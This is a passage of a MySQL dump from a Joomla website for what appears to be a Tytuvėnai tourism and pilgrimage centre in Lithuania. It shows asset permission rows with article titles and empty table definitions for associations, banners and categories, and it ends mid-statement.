istorija','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(381,157,565,566,3,'com_content.article.292','Mus apankė Japonijos ambasadorius','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(382,157,567,568,3,'com_content.article.293','Kviečiame visus į „Baltąjį vakarą“','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(383,157,569,570,3,'com_content.article.294','Sveikiname su pasauline turizmo diena!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(384,157,571,572,3,'com_content.article.295','Kalėdinis pasiūlymas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(385,157,573,574,3,'com_content.article.296','Kalėdų eglės įžiebimo diena','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(386,157,575,576,3,'com_content.article.297','Adventinė paroda \"Dangaus ir žemės pievose\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(387,157,577,578,3,'com_content.article.298','Pasiūlymas šv. Valentino dienai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(388,157,579,580,3,'com_content.article.299','Mieli Jaunavedžiai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(389,157,581,582,3,'com_content.article.300','Adventur 2018','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(390,157,583,584,3,'com_content.article.301','Vasario 16 d. minėjimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(391,157,585,586,3,'com_content.article.302','Laiko ženklai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(392,157,587,588,3,'com_content.article.303','PRO MEMORIA','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(393,157,589,590,3,'com_content.article.304','Spektaklis \"Amerika pirtyje\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(394,144,251,252,3,'com_content.article.305','Švento Jokūbo piligrimų kelias Lietuvoje ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(395,144,249,250,3,'com_content.article.306','Jono Pauliaus II piligrimų kelias','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(396,157,591,592,3,'com_content.article.307','Maldos pusryčiai Tytuvėnuose','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(397,157,593,594,3,'com_content.article.308','Šventinė-edukacinė programa','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(398,165,815,816,3,'com_content.article.309','Video apie Kelmės kraštą','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(399,157,595,596,3,'com_content.article.310','Fotografų dėmesiui','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(400,157,597,598,3,'com_content.article.311','Fotosesijos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(401,157,599,600,3,'com_content.article.312','Gimtadienis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(402,157,601,602,3,'com_content.article.313','Jubiliejaus minėjimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(403,157,603,604,3,'com_content.article.314','Svečiai iš JAV ambasados','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(404,157,605,606,3,'com_content.article.315','Vasaros sezono atidarymas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(405,157,607,608,3,'com_content.article.316','Dviračių žygis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(406,157,609,610,3,'com_content.article.317','XV tarptautinis Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(407,157,611,612,3,'com_content.article.318','Žygis dviračiais','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(408,157,613,614,3,'com_content.article.319','Baltas vakaras Tytuvėnuose','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(409,144,253,254,3,'com_content.article.320','Gedulingi pietūs','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(410,144,255,256,3,'com_content.article.321','Maitinimo meniu','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(411,144,257,258,3,'com_content.article.322','Maitinimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(412,157,615,616,3,'com_content.article.323','Iššūkis – „Surink Lietuvą“','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(413,157,617,618,3,'com_content.article.324','Apsilankykite Tytuvėnų ansamblyje','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(414,157,619,620,3,'com_content.article.325','Piligrimų pasas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(415,157,621,622,3,'com_content.article.326','Vargonų koncertai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(416,157,623,624,3,'com_content.article.327','Šventinės ekskursijos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(417,157,625,626,3,'com_content.article.328','Spalvotos Kalėdos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(418,157,627,628,3,'com_content.article.329','Rožių sodas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(419,297,843,844,3,'com_content.article.330','Rožių sodo įrengimo projektas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(420,157,629,630,3,'com_content.article.331','Tapybos darbų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(421,157,631,632,3,'com_content.article.332','Degustacinė vakarienė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(422,157,633,634,3,'com_content.article.333','Rožių sodo atidarymo šventė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(423,157,635,636,3,'com_content.article.334','\"ROŽIŲ SODO\" atidarymo šventė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(424,157,637,638,3,'com_content.article.335','BALTAS VAKARAS','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(425,157,639,640,3,'com_content.article.336','XVI Tytuvėnų vasasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(426,157,641,642,3,'com_content.article.337','Europos paveldo dienos Tytuvėnuose','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(427,157,643,644,3,'com_content.article.338','Naujas darbo laikas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(428,157,645,646,3,'com_content.article.339','Alinos Stonkutės-Čapienės fotografijos paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(429,157,647,648,3,'com_content.article.340','Kviečiame į fotografijos parodą','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(430,157,649,650,3,'com_content.article.341','Lietuvoje svečiuosis kunigas Leo','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(431,157,651,652,3,'com_content.article.342','ADVENTUR 2020','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(432,157,653,654,3,'com_content.article.343','XVII Tytuvėnų vasasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(433,157,655,656,3,'com_content.article.344','ŠEIMŲ ŠVENTĖ „ROŽIŲ SODE“','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(434,157,657,658,3,'com_content.article.345','„Lengvi, šilkiniai rūkai“ -  fotografijos paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(435,157,659,660,3,'com_content.article.346','Edukacija.Vienuolyno paslaptys.Pojūčių terapija','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(436,157,661,662,3,'com_content.article.347','Mobilioji aplikacija - programėlė','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(437,157,663,664,3,'com_content.article.348','Parama','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(438,157,665,666,3,'com_content.article.349','MOKYMAI','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(439,157,667,668,3,'com_content.article.350','Naujasis dviračių takas!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(440,157,669,670,3,'com_content.article.351','Piligrimystės mėnuo','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(441,157,671,672,3,'com_content.article.352','Piligriminis žygis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(442,157,673,674,3,'com_content.article.353','Liepos 6 d. renginiai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(443,157,675,676,3,'com_content.article.354','Piligrimystės mėnuo baigėsi','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(444,157,677,678,3,'com_content.article.355','XVIII Tytuvėnų vasaros festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(445,157,679,680,3,'com_content.article.356','Bažnyčių naktys','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(446,157,681,682,3,'com_content.article.357','Tytuvėnams – 725!','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(447,157,683,684,3,'com_content.article.358','Tytuvėnams 725 metai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(448,297,845,846,3,'com_content.article.359','Tytuvėnų kultūros paveldas ir jo pėdsakai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(449,157,685,686,3,'com_content.article.360','Tytuvėnų kultūros paveldas ir jo pėdsakai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(450,157,687,688,3,'com_content.article.361','Europos paveldo diena','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(451,157,689,690,3,'com_content.article.362','Europos paveldo dienos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(452,157,691,692,3,'com_content.article.363','Naktinės ekskursijos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(453,157,693,694,3,'com_content.article.364','Vienuolyno \"Rožių sodas\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(454,157,695,696,3,'com_content.article.365','Gidų kursai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(455,157,697,698,3,'com_content.article.366','XVII a. itališkų vilanelių koncertas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(456,157,699,700,3,'com_content.article.367','V Šiaulių krašto turizmo forumas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(457,157,701,702,3,'com_content.article.368','Konkursas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(458,157,703,704,3,'com_content.article.369','Piligriminins žygis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(459,1,909,910,1,'com_mobilejoomla','mobilejoomla','{}'),(461,157,705,706,3,'com_content.article.370','Žygis  keliu \"Via Gratiarum\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(462,157,707,708,3,'com_content.article.371','Senųjų žemaitiškų rakandų paroda','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(463,157,709,710,3,'com_content.article.372','Bažnyčių naktys','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(464,144,259,260,3,'com_content.article.373','Maitinimas (2)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(465,157,711,712,3,'com_content.article.374','Vakaro sutemos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(466,157,713,714,3,'com_content.article.375','EUROPOS PAVELDO DIENOS \'22','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(467,468,851,852,3,'com_content.article.376','Tytuvėnų regioninio parko pėsčiųjų trasos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(468,8,850,855,2,'com_content.category.58','Trasos','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(469,468,853,854,3,'com_content.article.377','Tytuvėnų regioninio parko dviračių trasos','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(470,157,715,716,3,'com_content.article.378','Tytuvėnų šviesų festivalis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(471,157,717,718,3,'com_content.article.379','Piligrimystės reikšmė ir patirtys','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(472,157,719,720,3,'com_content.article.380','Vasario 16-osios minėjimas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(473,157,721,722,3,'com_content.article.381','Ieškome renginių organizatoriaus (-ės)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(474,157,723,724,3,'com_content.article.382','Kovo 11-oji','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(475,157,725,726,3,'com_content.article.383','Bažnyčių atspindžiai stikle','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(476,157,727,728,3,'com_content.article.384','Bažnyčių atspindžiai stikle','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(477,157,729,730,3,'com_content.article.385','Tytuva\'23','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(478,157,731,732,3,'com_content.article.386','Bažnyčių naktys 2023','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(479,157,733,734,3,'com_content.article.387','Bažnyčių naktys 2023','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(480,157,735,736,3,'com_content.article.388','Dviračių žygis \'23','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(481,157,737,738,3,'com_content.article.389','Gyvasis paveldas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(482,165,817,818,3,'com_content.article.390','Apgyvendinimas - Tytuvėnai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(483,144,261,262,3,'com_content.article.391','Veiklos planas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(484,157,739,740,3,'com_content.article.392','Meilė klysta','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(485,157,741,742,3,'com_content.article.393','Projektas','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(486,297,847,848,3,'com_content.article.394','Tytuvėnų piligrimų centras įveiklinimas ir aktualizavimas ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(487,157,743,744,3,'com_content.article.395','Bažnyčių naktys 2024','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(488,157,745,746,3,'com_content.article.396','Vykę \"Bažnyčių naktys\" renginiai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(489,157,747,748,3,'com_content.article.397','Planuojate įsigyti gidų paslaugas?','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}');
/*!40000 ALTER TABLE `xyhmu_assets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_associations`
--

DROP TABLE IF EXISTS `xyhmu_associations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_associations` (
  `id` varchar(50) NOT NULL COMMENT 'A reference to the associated item.',
  `context` varchar(50) NOT NULL COMMENT 'The context of the associated item.',
  `key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
  PRIMARY KEY (`context`,`id`),
  KEY `idx_key` (`key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_associations`
--

LOCK TABLES `xyhmu_associations` WRITE;
/*!40000 ALTER TABLE `xyhmu_associations` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_associations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_banner_clients`
--

DROP TABLE IF EXISTS `xyhmu_banner_clients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_banner_clients` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `contact` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `extrainfo` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `metakey` text NOT NULL,
  `own_prefix` tinyint(4) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(255) NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_metakey_prefix` (`metakey_prefix`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_banner_clients`
--

LOCK TABLES `xyhmu_banner_clients` WRITE;
/*!40000 ALTER TABLE `xyhmu_banner_clients` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_banner_tracks`
--

DROP TABLE IF EXISTS `xyhmu_banner_tracks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_banner_tracks` (
  `track_date` datetime NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL,
  `count` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
  KEY `idx_track_date` (`track_date`),
  KEY `idx_track_type` (`track_type`),
  KEY `idx_banner_id` (`banner_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_banner_tracks`
--

LOCK TABLES `xyhmu_banner_tracks` WRITE;
/*!40000 ALTER TABLE `xyhmu_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_banners`
--

DROP TABLE IF EXISTS `xyhmu_banners`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_banners` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `clickurl` varchar(200) NOT NULL DEFAULT '',
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` text NOT NULL,
  `custombannercode` varchar(2048) NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `params` text NOT NULL,
  `own_prefix` tinyint(1) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(255) NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_state` (`state`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_metakey_prefix` (`metakey_prefix`),
  KEY `idx_banner_catid` (`catid`),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_banners`
--

LOCK TABLES `xyhmu_banners` WRITE;
/*!40000 ALTER TABLE `xyhmu_banners` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_banners` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_categories`
--

DROP TABLE IF EXISTS `xyhmu_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(255) NOT NULL DEFAULT '',
  `extension` varchar(50) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `note` varchar(255) NOT NULL DEFAULT '',
  `description` mediumtext NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
